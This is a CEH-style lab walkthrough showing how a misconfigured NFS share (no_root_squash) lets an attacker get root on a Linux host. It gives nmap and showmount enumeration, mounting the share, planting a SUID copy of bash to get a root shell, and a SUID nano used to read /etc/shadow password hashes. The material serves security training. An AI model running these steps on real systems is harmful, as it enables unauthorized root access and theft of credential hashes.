Escalate Privileges in Linux Machine by Exploiting Misconfigured NFS

ILABS CEH PRACTICAL

Network File System (NFS) is a protocol that enables users to access files remotely through a network. Remote NFS can be accessed locally when the shares are mounted. If NFS is misconfigured, it can lead to unauthorized access to sensitive data or obtain a shell on a system.



Here, we will exploit misconfigured NFS to gain access and to escalate privileges on the target machine.

❖ Install NFS service on Victim Machine; execute below command in your terminal and open /etc/export file for configuration. The /etc/exports file holds a record for each directory that you expect to share within a network machine. Each record describes how one directory or file is shared.

sudo apt-get update sudo apt install nfs-kernel-server nano /etc/exports

❖ Edit the export file to make home directory as share: An NFS system is considered weak or Misconfigured when following entry/record is edit into it for sharing any directory. The entry shows that we have shared /home directory and allowed the root user on the client to access files to read/ write operation and * sign denotes connection from any Host machine

```
/home *(rw,no_root_squash)
```

```
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home *(rw,no_root_squash)
```

Restart the server

sudo /etc/init.d/nfs-kernel-server restart

* Scan the system: From Parrot OS, scan the machine. We should see port 2049 open.

nmap -sV --script=nfs-showmount 192.168.1.102

```
@kali:~# nmap -sV --script=nfs-showmount 192.168.1.102
tarting Nmap 7.70 ( https://nmap.org ) at 2018-05-24 07:24 EDT
 ap scan report for 192.168.1.102
       STATE SERVICE VERSION
                     vsftpd 3.0.3
                     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
                    Apache httpd 2.4.18 ((Ubuntu))
http-server-header: Apache/2.4.18 (Ubuntu)
11/tcp open rpcbind 2-4 (RPC #100000)
nfs-showmount:
  program version
                    port/proto service
  100000 2,3,4
                      111/tcp rpcbind
  100000 2.3.4
                      111/udp rpcbind
                      2049/udp nfs
                      2049/tcp nfs
                     34993/tcp__nlockmgi
                      2049/tcp nfs acl
                      2049/udp nfs acl
  9/tcp open nfs acl 2-3 (RPC #100227)
  Address: 00:0C:29:DB:CE:33 (VMware)
ervice Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux kernel
```

Service detection performed. Please report any incorrect results at https://nmap.org Nmap done: 1 IP address (1 host up) scanned in 7.22 seconds

Manual NFS Enumeration: The same thing can be done manually by using showmount command but for that install the nfs-common package on your local machine with help of the following command.

apt-get install nfs-common showmount -e 192.168.1.102

```
root@kali:~# showmount -e 192.168.1.102 (=
Export list for 192.168.1.102:
/home *
```

* Exploiting NFS server: Now execute below command on your local machine to exploit NFS server for root privilege. Above command will create a new folder nfs inside /tmp and mount shared directory /home inside /tmp/nfs. Then upload a local exploit to gain root by copying bin/bash and set suid permission.

```
mkdir /tmp/nfs
mount -t nfs 192.168.1.102:/home /tmp/nfs
cp /bin/bash .
chmod +s bash
ls -la bash
```

Privilege Escalation: First, you need to compromise the target system and then move to the privilege escalation phase. Suppose you have successfully login into victim's machine through ssh. Now we know that /home is shared directory, therefore, move inside it and follow below steps to get root access of victim's machine.

```
cd /home
ls
./bash -p
id
whoami
```

❖ Further Exploitation: Now we have got root privileges on the target machine, we will install nano editor in the target machine so that we can exploit root access. We will set SUID bit in the program permissions, so that it is executed as root

cp /bin/nano . chmod 4777 nano ls -la nano

Exploiting Nano Permissions: To see the hashes of all users, we can use the following command

./nano -p /etc/shadow

DEMO

THANKS

